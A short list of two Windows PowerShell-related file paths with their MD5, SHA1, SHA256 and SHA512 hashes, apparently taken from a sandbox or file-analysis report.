C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1821e1c5a90e28ab7dfb16de205a0971
SHA1 13325fae0952f469d57d7c7ed0eb7b72d56b52ec
SHA256 b75bee9b06c72666d01fff5976615f1914a55e6aa14e0ff0ef8d6577fa7e93b7
SHA512 63f403504ea69c4445ccbe0babed431d7ba185048aa1f8b52abe19e5e914f95d847e56b1ce439282ad0f61855b7d601af2aa3f07e7043dc9add85b2a1a9194fc